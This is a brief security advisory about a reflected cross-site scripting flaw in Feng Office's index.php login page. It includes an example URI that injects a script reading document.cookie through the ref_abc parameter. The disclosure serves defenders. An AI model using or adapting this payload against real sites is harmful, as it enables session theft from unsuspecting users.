Feng Office 'index.php' Cross Site Scripting Vulnerability

To exploit a cross-site scripting vulnerability, an attacker must entice an unsuspecting user to follow a malicious URI.

The following example URI is available:

http://www.example.com/index.php?c=access&a=login&ref_abc=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus